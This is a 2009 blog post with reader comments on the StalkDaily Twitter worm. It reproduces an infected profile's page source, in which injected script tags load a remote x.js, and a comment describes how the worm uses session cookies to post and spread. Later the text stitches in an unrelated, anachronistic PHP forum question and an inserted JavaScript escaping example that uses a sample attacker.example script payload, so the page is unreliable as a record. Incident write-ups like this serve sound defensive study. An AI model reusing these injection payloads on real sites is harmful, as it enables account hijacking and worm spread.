Network World

Curt Monash

A Twitter virus shows up: StalkDaily

By CurtMonash on Sat, 04/11/09 - 5:31pm.

A Twitter virus has shown up.  Tweetstreams, including mine, send out the message:

Hey everyone, join www. StalkDaily. com. It's a site like Twitter but with pictures, videos, and so much more! :) 

(Of course, the URL link is live in the original.)

Update: Twitter now claims to have patched the hole that allowed the virus to spread. And I've posted a simpler version of the whole story.

Nobody seems to know yet exactly what is going on. http://twittercism.com/howto-remove-stalkdaily/ is getting a lot of attention with advice to stop it, but basically just says "Change your password and clear your cookies and browser cache; that should work."

Some people are assuming the virus is contracted by actually visiting the site, but I'm sure I got it WITHOUT visiting the site.

I'll try to get more information here, in the main post or comment thread, when I can.

Edit: Mark Hawker is figuring out how this works, and updating the comment thread below. He's posting more detail yet in his own Twitter stream.

Edit: @pilot suggests disabling scripts via NoScript in Firefox. But this has painful side effects.

Edit: @anowheels thinks clicking on the GangsterBoy Twitter account can cause infection -- and I did click there right before getting hit. The theory is plausible for other reasons.

Specifically, there's a profile broken in a way I haven't seen before, looking like:

View Source right now gives:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="en-us" http-equiv="Content-Language" />
<meta content="Twitter is a free social messaging utility for staying connected in real-time" name="description" />
<meta content="no" http-equiv="imagetoolbar" />
<meta content="width = 780" name="viewport" />
<meta content="4FTTxY4uvo0RZTMQqIyhh18HsepyJOctQ+XTOu1zsfE=" name="verify-v1" />
<meta content="1" name="page" />
<meta content="IE=7" http-equiv="X-UA-Compatible" />
<meta content="y" name="session-loggedin" />
<meta content="11326952" name="session-userid" />
<meta content="CurtMonash" name="session-user-screen_name" />
<meta content="GangsterBoyHah" name="page-user-screen_name" />
<title>gangsterboy (GangsterBoyHah) on Twitter</title>
<link href="http://assets1.twitter.com/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://assets1.twitter.com/images/twitter_57.png" rel="apple-touch-icon" />
<script type="text/javascript">
//<![CDATA[
var page = {};
//]]>
</script>

<link href="http://assets3.twitter.com/stylesheets/screen.css?1239469830" media="screen, projection" rel="stylesheet" type="text/css" />
<link href="http://assets3.twitter.com/stylesheets/master.css?1239469826" media="screen, projection" rel="stylesheet" type="text/css" />
<style type="text/css">
/* begin custom css */
.top-navigation > li > a,
a { color: #0084B4; }
body {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
background-color: #9AE4E8;
background: #9AE4E8 url(http://static.twitter.com/images/themes/theme1/bg.gif) fixed no-repeat top left;}
#side_base {
border-left:1px solid #BDDCAD;
background-color: #DDFFCC;
width: 199px; line-height: 1.2; -moz-border-radius-topright: 5px; -webkit-border-top-right-radius: 5px; -moz-border-radius-bottomright: 5px; -webkit-border-bottom-right-radius: 5px;
}
#side div.last { border-top: 1px solid #BDDCAD; }
ul#tabMenu li {
display: block; width: 100%;
border-top: 1px solid #BDDCAD;
}
ul#tabMenu li a, #side .section h1 { color:#script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }
#content tr.hentry:hover a { color:#0084B4; }
body#profile #content div.hentry:hover a { color:#0084B4;}
#side .actions { border: 1px solid #BDDCAD; }
#side .promotion {
background-image:url('http://static.twitter.com/images/pale.png');
border: 1px solid #BDDCAD;
text-align: left; font-size: 11px; margin-top: 7px; padding: 6px 10px; width: 152px;
}
#side .promotion .definition span {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}
#side .promo { border: 1px solid #BDDCAD; }
#side .stats td+td {
border-left: solid 1px #BDDCAD;
border-right: solid 1px #BDDCAD;
}
#side div.section-header h1 { color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }
#side div.section-header h3.faq-header {
border-bottom: 1px solid #BDDCAD;
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}
#side .stat a {color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }



#side div.user_icon a, #side div.user_icon a:hover {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}

#side div.user_icon a:hover {
color: #0084B4;
}

#side .stats {
border-top: 1px solid #BDDCAD;
}

#side .stats a span.stats_count {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}

#side .stats a:hover span.stats_count {
color: #0084B4;
}

ul.sidebar-menu li.active a b {
border-left: 5px solid #BDDCAD;
}

ul.sidebar-menu li.active a {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}

#side hr {
background: #BDDCAD;
color: #BDDCAD;
}

#side .stats td+td {
border-left: none;
border-right: none;
}

#side div.collapsible h2.sidebar-title {
background: transparent url('http://static.twitter.com/images/toggle_up_dark.png') no-repeat center right !important;
width: 155px;
}

#side div.collapsible.collapsed h2.sidebar-title {
background: transparent url('http://static.twitter.com/images/toggle_down_dark.png') no-repeat center right !important;
}



/* end custom css */

.content-bubble-arrow { background-image: url(http://static.twitter.com/images/arr2.gif); }
.status-btn input.round-btn { background-image: url('http://static.twitter.com/images/round-btn.gif'); }
.status-btn input.round-btn:hover { background-image: url('http://static.twitter.com/images/round-btn-hover.gif'); }
.status-btn input.disabled, .status-btn input.disabled:hover { background-image: url('http://static.twitter.com/images/round-btn.gif'); }
.hentry .actions .fav { background-image: url('http://static.twitter.com/images/icon_star_full.gif'); }
.hentry .actions .non-fav { background-image: url('http://static.twitter.com/images/icon_star_empty.gif'); }
.hentry .actions .fav-throb, .hentry .actions a.del-throb { background-image: url('http://static.twitter.com/images/icon_throbber.gif'); }
.hentry .actions .del { background-image: url('http://static.twitter.com/images/icon_trash.gif'); }
body#show .reply, .hentry .actions .reply { background-image: url('http://static.twitter.com/images/icon_reply.gif'); }
.direct_message .actions .reply { background-image: url('http://static.twitter.com/images/icon_direct_reply.gif'); }
.direct_message .actions .del { background-image: url('http://static.twitter.com/images/icon_trash.gif'); }
.notify { background-image: url('http://static.twitter.com/images/girl.gif'); }
.promotion, ul#tabMenu a#keyword_search_tab.hover, ul#tabMenu a:hover { background-image: url('http://static.twitter.com/images/pale.png'); background-color: transparent; }
div#follow-toggle.closed { background-image: url('http://static.twitter.com/images/toggle_closed.gif'); }
div#follow-toggle.opened { background-image: url('http://static.twitter.com/images/toggle_opened.gif'); }
.follow-actions .following { background-image: url('http://static.twitter.com/images/checkmark.gif'); }
.loading { background-image: url('http://static.twitter.com/images/loader.gif'); }
.more { background-image: url('http://static.twitter.com/images/more.gif'); }
.more.loading { background-image: url('http://static.twitter.com/images/ajax.gif'); }
body#show .protected { background-image: url('http://static.twitter.com/images/icon_lock.gif'); }
#side .promotion { background-image: url('http://static.twitter.com/images/pale.png'); }
.rss { background-image: url('http://static.twitter.com/images/rss.gif'); }

.bulletin a.close { background: transparent url('http://static.twitter.com/images/close_small.png') no-repeat; }
ul.sidebar-menu li.active a { font-weight: bold; color: #333; background: url('http://static.twitter.com/images/pale.png'); }
ul.sidebar-menu li:hover a { text-decoration: none; background: url('http://static.twitter.com/images/pale.png'); }
#sidebar_search_submit { background: url('http://static.twitter.com/images/nav_search_submit.png') -2px 0px !important ; }
#sidebar_search_submit:hover { background: url('http://static.twitter.com/images/nav_search_submit.png') -2px -25px !important; }
#sidebar_search_submit:active { background: url('http://static.twitter.com/images/nav_search_submit.png') -2px -50px !important; }
#sidebar_search_submit.loading, #sidebar_search_submit.loading:hover, #sidebar_search_submit.loading:active { background: #eee url('http://static.twitter.com/images/ajax.gif') no-repeat 5px 5px !important; }
#side .collapsible.loading h2.sidebar-title { background: transparent url('http://static.twitter.com/images/ajax.gif') no-repeat center right; }
#side .collapsible h2.sidebar-title {
background: transparent url('http://static.twitter.com/images/toggle_up_dark.png') no-repeat center right;
width: 155px;
}

#side .collapsible.collapsed h2.sidebar-title {
background: transparent url('http://static.twitter.com/images/toggle_down_dark.png') no-repeat center right;
}



</style>
    
</head>

<body class="account firefox-windows" id="profile">
<div id="dim-screen"></div>
<ul id="accessibility" class="offscreen">
<li><a href="#content" accesskey="0">Skip past navigation</a></li>
<li>On a mobile phone? Check out <a href="http://m.twitter.com/">m.twitter.com</a>!</li>
  <li><a href="#footer" accesskey="2">Skip to navigation</a></li>
<li><a href="#tabMenu" accesskey="3">Jump to the sidebar</a></li>
<li><a href="#signin">Skip to sign in form</a></li>
</ul>



<div id="container" class="subpage">
<span id="loader" style="display:none"><img alt="Loader" src="http://assets0.twitter.com/images/loader.gif" /></span>

<h1 id="header">
    <a href="/home" title="Twitter: home" accesskey="1" id="logo">
<img alt="Twitter.com" height="36" src="http://assets0.twitter.com/images/twitter_logo_header.png" transparent_png="true" width="155" />
</a>
</h1>






<div class="content-bubble-arrow"></div>

<table cellspacing="0" class="columns">
<tbody>
<tr>
<td id="content" class="round-left column">
                                <div class="wrapper">


<div class="profile-head">
<h2 class="thumb">
<img alt="" class="profile-img" height="73" src="https://s3.amazonaws.com/twitter_production/profile_images/133719611/940a9a0f-6c7c-11dd-8677-0519e018e1cd_bigger.jpg" width="73" /> GangsterBoyHah
</h2>
<div class="clear"></div>



<div class="protected-box">
<table><tr><td><br /><img alt="Padlock_large" src="http://assets3.twitter.com/images/padlock_large.gif" /></td>
      
<td><h1>This person has protected their updates.</h1>



<br />
<span class='sub-h1'>You need to send a request before you can start following this person.</span>
</td></tr></table>
<center>
<form action="friendships/create/30519351" method="post"><div style="margin:0;padding:0"><input name="authenticity_token" type="hidden" value="5072bac31fff2d4527bccf68cf6c48d16f1c6735" /></div> <input id="send_request" name="commit" type="submit" value="Send request" />
</form>
        </center><br />

</div>

</div>


</div>
</td>

<td id="side_base" class="column round-right">

<div id="side">

<div id="profile" class="section">
<span class="section-links">

<img src="http://assets0.twitter.com/images/icon_lock_sidebar.gif" title="This user&rsquo;s updates are protected."/>
</span>
<address>
<ul class="about vcard entry-author">
<li><span class="label">Name</span> <span class="fn">gangsterboy</span></li>
<li><span class="label">Location</span> <span class="adr">Google</span></li>
                    <li><span class="label">Web</span> <a href="http://"><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a " class="url" rel="me nofollow">http://"><script ...</a></li>

</ul>
</address>

<div class="stats">
<table>
<tr>
<td>

<a href="/GangsterBoyHah/friends" id="following_count_link" class="link-following_page" rel="me" title="See who you’re following">
<span id="following_count" class="stats_count numeric">903 </span>
<span class="label">Following</span>
</a>

</td>
<td>

<a href="/GangsterBoyHah/followers" id="follower_count_link" class="link-followers_page" rel="me" title="See who’s following you">
<span id="follower_count" class="stats_count numeric">2 </span>
<span class="label">Followers</span>
</a>

</td>
<td><a href="/GangsterBoyHah" class="link-updates" title="See all your updates" rel="me"><span id="update_count" class="stats_count numeric">126</span><span class="label">updates</span>
</a></td>
</tr>
</table>
</div>

</div>

<ul id="tabMenu">
<li>
<a href="/GangsterBoyHah" accesskey="u" id="updates_tab">Updates</a> </li>
<li>
<a href="/GangsterBoyHah/favourites" accesskey="f" id="favorites_tab">Favorites</a> </li>
</ul>



<div class="section last">
<h1>Actions</h1>
<ul>
<li>
<a href="/direct_messages/create/30519351">message</a> GangsterBoyHah
</li>


<a href="/blocks/confirm/30519351" style="color: grey;">block</a> GangsterBoyHah


</ul>
</div>

<div id="people" class="section last">
<h1>Following</h1>

<div id="following_list">

<span class="vcard">
<a href="https://twitter.com/Noword" class="url" rel="contact" title="Noword"><img alt="Noword" class="photo fn" height="24" src="https://s3.amazonaws.com/twitter_production/profile_images/54123748/pepsiman_mini.jpg" width="24" /></a>
</span>


<span class="vcard">
<a href="https://twitter.com/soychicka" class="url" rel="contact" title="soychicka"><img alt="soychicka" class="photo fn" height="24" src="https://s3.amazonaws.com/twitter_production/profile_images/111024484/blythie_mini.jpg" width="24" /></a>
</span>


<span class="vcard">
<a href="https://twitter.com/SWAGGRITE" class="url" rel="contact" title="SWAGGRITE ENT."><img alt="SWAGGRITE ENT." class="photo fn" height="24" src="https://s3.amazonaws.com/twitter_production/profile_images/131191695/Picture_025_mini.jpg" width="24" /></a>
</span>


</div>
</div>






</div>
</td>

</tr>
</tbody>
</table>



<div id="footer" class="round">
<h3 class="offscreen">Footer</h3>

<ul>
<li class="first">&copy; 2009 Twitter</li>
<li><a href="/about#about">About Us</a></li>
<li><a href="/about#contact">Contact</a></li>
<li><a href="http://blog.twitter.com">Blog</a></li>
<li><a href="http://status.twitter.com">Status</a></li>
<li><a href="/downloads">Apps</a></li>
<li><a href="http://apiwiki.twitter.com/">API</a></li>
<li><a href="http://search.twitter.com">Search</a></li>
<li><a href="http://help.twitter.com">Help</a></li>
<li><a href="/jobs">Jobs</a></li>
<li><a href="/tos">Terms</a></li>
<li><a href="/privacy">Privacy</a></li>
</ul>
</div>



<hr />

<div id="navigation">
<ul class="horizontal-nav top-nav round" style="display:inline">
<li><a href="http://twitter.com/home" accesskey="h" id="home_link">Home</a></li>
<li><a href="http://twitter.com/CurtMonash" accesskey="p" id="profile_link">Profile</a></li>
<li><a href="http://twitter.com/invitations/find_on_twitter" accesskey="=" id="find_people_link">Find People</a></li>
<li><a href="/account/settings" accesskey="s" id="settings_link">Settings</a></li>
<li><a href="http://help.twitter.com" accesskey="?" id="help_link">Help</a></li>
<li class="last">

<a id="sign_out_link" href="#" onclick="document.getElementById('sign_out_form').submit(); return false;">Sign out</a>

</li>

<form method="post" id="sign_out_form" action="/sessions/destroy" style="display:none;">
<input name="authenticity_token" value="5072bac31fff2d4527bccf68cf6c48d16f1c6735" type="hidden" />
</form>
</ul>
</div>


</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script><script src="http://assets2.twitter.com/javascripts/application.js?1239469782" type="text/javascript"></script><script src="http://assets3.twitter.com/javascripts/jquery.watermarkinput.js?1239469798" type="text/javascript"></script><script src="http://assets1.twitter.com/javascripts/notifications.js?1239469800" type="text/javascript"></script><script src="http://assets1.twitter.com/javascripts/search.js?1239469801" type="text/javascript"></script>
<script src="http://assets1.twitter.com/javascripts/jquery.cookie.js?1239469791" type="text/javascript"></script><script type="text/javascript">
//<![CDATA[
twttr.form_authenticity_token = '5072bac31fff2d4527bccf68cf6c48d16f1c6735';
if (window.top !== window.self) { setTimeout(function(){document.body.innerHTML='';},1);window.self.onload=function(evt){document.body.innerHTML='';};}
//]]>
</script><script type="text/javascript">
//<![CDATA[

$( function () {
$('body#profile ul#tabMenu li a#updates_tab, body#favourings ul#tabMenu li a#favorites_tab').isSidebarTab();

});

//]]>
</script>

    

<!-- BEGIN google analytics -->

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-30775-6");
pageTracker._setDomainName("twitter.com");
pageTracker._setVar('Logged In');
pageTracker._setVar('lang: en');
pageTracker._initData();
pageTracker._trackPageview('/profile/GangsterBoyHah');
} catch(err) { }
</script>

<!-- END google analytics -->




    <div id="notifications"></div>

</body>

</html>

 

Edit: A Malwarebytes scan comes up with three instances of malware.  One is the Seneka rootkit (ouch!).  I don't immediately know whether all three boil down to that. The logfile is below. I've bolded selectively.

Malwarebytes' Anti-Malware 1.36
Database version: 1969
Windows 5.1.2600 Service Pack 3

4/11/2009 6:49:38 PM
Malwarebytes log mbam-log-2009-04-11 (18-49-21)

Scan type: Full Scan (C:\|D:\|)
Objects scanned: 209851
Time elapsed: 34 minute(s), 30 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 2
Registry Values Infected: 0
Registry Data Items Infected: 1
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\cs41275 (Malware.Trace) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\seneka (Rootkit.Trace) -> No action taken.

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)


 

Searching on Seneka rootkit turns up very different pages than searching on cs41275, so I suspect them of being two different infections.

As of this posting I haven't yet sorted out what to DO about these infections, but there's advice on the Web, especially about Seneka.

At a guess they're unrelated to StalkDaily, but I can't be sure at the moment.

Another bad Twitter account

0

TheGoodGuy is not a good guy on Twitter. Just after I clicked in there I sent the StalkDaily messages

..

0

Having spent more time working on these pages I have noticed 2 things: 1. The question I asked earlier was really very stupid (!) and 2 how logically they have been put together!

One question though, I have modified the database with other fields etc, and what I have done is on the admin page I have added a link on the users table to go to the userinfo.php page about that user (which works fine).

However, earlier I had modified that page (userinfo) so that anyone other than the user whose details they were could not access the page (see code). Is there any way to change the IF statement to IF(session username OR admin)???

Thanks, Jamie
<?php
/* Requested Username error checking */
$req_user = trim($_GET['user'] ?? '');
if(!$req_user || strlen($req_user) == 0 ||
!preg_match('/^[0-9a-z]+$/i', $req_user) || /* eregi() was removed in PHP 7 */
!$database->usernameTaken($req_user)){
die("Username not registered");
}

/* Logged in user viewing own account */
if(strcmp($session->username,$req_user) == 0){
echo "My Account";
}
/* Visitor not viewing own account */
else{
echo "You are not authorised to view this information";
}

/* Display requested user information */
$req_user_info = $database->getUserInfo($req_user);

/* Username and the other fields, shown to the account owner only.
   Values are HTML-escaped on output so stored markup is not rendered. */
if(strcmp($session->username,$req_user) == 0){
echo "Username: ".htmlspecialchars($req_user_info['username'])."<br>";
echo "Email: ".htmlspecialchars($req_user_info['email'])."<br>";
echo "Title: ".htmlspecialchars($req_user_info['title'])."<br>";
echo "Forename: ".htmlspecialchars($req_user_info['forename'])."<br>";
echo "Surname: ".htmlspecialchars($req_user_info['surname'])."<br>";
echo "Address 1: ".htmlspecialchars($req_user_info['address1'])."<br>";
echo "Address 2: ".htmlspecialchars($req_user_info['address2'])."<br>";
echo "City: ".htmlspecialchars($req_user_info['city'])."<br>";
echo "County: ".htmlspecialchars($req_user_info['county'])."<br>";
echo "Postcode: ".htmlspecialchars($req_user_info['postcode'])."<br>";
echo "Phone number: ".htmlspecialchars($req_user_info['telephone'])."<br>";
echo "Mobile number: ".htmlspecialchars($req_user_info['mobilephone'])."<br>";
}
?>


We will always have such

0

We will always have such people how making so bad things here....

Nasty Stalkdaily

0

I think I got infected by visiting the profile page of someone else who was infected. I changed my password and logged out of twitter, but when I tried to log back in, got the message that I was locked out of my account because of multiple failed attempts to log in. Very annoying!

Kurt, what the virus is

0

Kurt, what the virus is doing is executing an XSS http://en.wikipedia.org/wiki/Cross-site_scripting hack whereby the following steps are reproduced:

1) A user visits an "infected" profile i.e. one that has tweeted the update message AND has a modified site URL, and after 3250ms an AJAX request is made which extracts a username and Twitter cookie.
2) The cookie and username are used to generate a valid Twitter authentication token which allows the script to then perform any of the Twitter API functions.
3) Currently, the functions can be found here: http://mikeyylolz.uuuq.com/x.js which include updating a user's status and updating their profile URL. This is where the virus spreads.
4) By adding itself to a user's profile URL, anyone who visits that profile (and does not exit within 3250ms) will be infected if the cookie and username are found.

What this means for Twitter. 1) They do not securely store user information via cookies and 2) They are open to XSS attacks whereby ANY JavaScript can be added to a user's profile without them knowing.

This is only the beginning if they do not plug these holes. Anyone more malicious could have brought Twitter down today, or at least caused a lot more destruction.

Mark -- thanks for the updates!

0

Mark,

Great work! Please keep it coming!

CAM

Kurt, the fix: 1) Go

0

Kurt, the fix:

1) Go immediately to http://twitter.com/account/settings and make sure your URL is your own. If it is set to StalkDaily then make sure you highlight the FULL URL field and delete it. Then, input your own URL again.
2) I'd recommend you change your password, but I don't think this is essential.

To prevent being re-infected, if you go to a Twitter profile which has the StalkDaily URL, get off it! You have about 3 seconds to react, so be quick. I'm not joking, the script waits 3 seconds before executing.

Kurt, tried to replicate the

0

Kurt, tried to replicate the "virus" locally and found that the only way it will execute is via a logged-in user's profile i.e. it in no way accesses your password details. It uses a cookie and authentication token generated (and posted publicly) by Twitter to perform API actions. To perform these actions you need *both* components, and so cannot extract authentication tokens without also having login details.

This potentially rules out any server-side exploit without having username and password credentials. However, this "virus" uses client-side scripting which takes advantage of vulnerabilities only Twitter can fix.

The best thing you can do is make sure your URL is as it should be, and that you stay away from profiles with rogue URLs. Otherwise, you should all be fine. Phew.

Stalker virus

0

On the gangsterboyhah profile, look at the source.
body {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;

The script is hidden in the color
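
In the View Source dump, the profile's Web field reaches the page unencoded, while the colour values noted in the comment above carry the same text with its punctuation gone. The sketch below is an added example (not code from the post, the commenters or Twitter) contrasting raw concatenation with allow-list validation plus output encoding; every function name is hypothetical, the punctuation-stripping filter is an assumption about how the colour value came to look that way, and the sample value is constructed with a placeholder host.

```javascript
// Added example. SAMPLE_URL_FIELD is constructed input modelled on the "Web"
// field in the View Source dump; attacker.example is a placeholder host.
const SAMPLE_URL_FIELD =
  'http://"><script src="http://attacker.example/x.js"></script><a ';

// Encode for HTML text and double-quoted attribute contexts.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// BEFORE: the stored value is concatenated as-is, so a double quote inside it
// closes the href attribute and the remainder is parsed as markup.
function renderWebLinkUnsafe(url) {
  return '<a href="' + url + '" class="url" rel="me nofollow">' + url + '</a>';
}

// Write-time validation: the value must parse as a URL and use http or https.
// Returns the normalised URL string, or null when the value is rejected.
function normalizeProfileUrl(input) {
  let u;
  try {
    u = new URL(String(input).trim());
  } catch (e) {
    return null; // not parseable as an absolute URL
  }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  if (!u.hostname) return null;
  return u.href;
}

// AFTER: validate, then encode at the point of output. Encoding is applied even
// to validated values, because validation and rendering can drift apart.
function renderWebLink(url) {
  const safe = normalizeProfileUrl(url);
  if (safe === null) return ''; // render no link rather than a broken one
  const e = escapeHtml(safe);
  return '<a href="' + e + '" class="url" rel="me nofollow">' + e + '</a>';
}

// Assumed filter: dropping everything except letters, digits and spaces leaves
// inert junk in the stylesheet, which matches the shape of the colour values in
// the dump. It neutralises this input by accident, not by design.
function stripToAlnum(input) {
  return String(input).replace(/[^0-9a-z ]/gi, '');
}

// Allow-list for a theme colour: exactly 3 or 6 hex digits, optional leading '#'.
// Anything else is rejected instead of being "cleaned" and stored.
function normalizeHexColor(input) {
  const m = /^#?([0-9a-f]{3}|[0-9a-f]{6})$/i.exec(String(input).trim());
  return m ? '#' + m[1].toUpperCase() : null;
}

// Simple check used by the demo: does rendered HTML contain a script element?
function hasScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('unsafe render has <script>:', hasScriptTag(renderWebLinkUnsafe(SAMPLE_URL_FIELD)));
console.log('validated URL:', normalizeProfileUrl(SAMPLE_URL_FIELD));
console.log('safe render:', JSON.stringify(renderWebLink(SAMPLE_URL_FIELD)));
console.log('legit link:', renderWebLink('https://example.com/?a=1&b=2'));
console.log('stripped colour:', stripToAlnum('"><script src="http://attacker.example/x.js"></script>'));
console.log('validated colour:', normalizeHexColor('script srchttpattackerexamplexjsscript'));
```
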

small, small world

0

I follow a guy who got hit with the SD virus who posted a link to your blog, Curt...and here I am walking down memory lane. ;-)
Glad to have run into you again, Curt...even if it was through a link from a guy who'd gotten hit with a virus.

About A World of Bytes

Curt Monash is a leading analyst of and strategic advisor to the software industry. Praised by Lawrence J. Ellison for his "unmatched insight into technology and marketplace trends," Curt was the software/services industry's #1 ranked stock analyst while at PaineWebber, Inc., where he served as a First Vice President until 1987. He subsequently co-founded Evernet, Inc., a $40 million networking systems integrator. Since 1990, he has owned and operated Monash Research, an analysis and advisory firm covering software-intensive sectors of the technology industry. In that period he also has been co-founder, president, or chairman of several other technology startups.

Curt has served as a strategic advisor to many well-known firms, including Oracle, Microsoft, SAP, AOL, CA, and Netezza. Curt earned a Ph.D. in mathematics (Game Theory) from Harvard University. He has held faculty positions in mathematics, economics and public policy at Harvard, Yale, and Suffolk universities.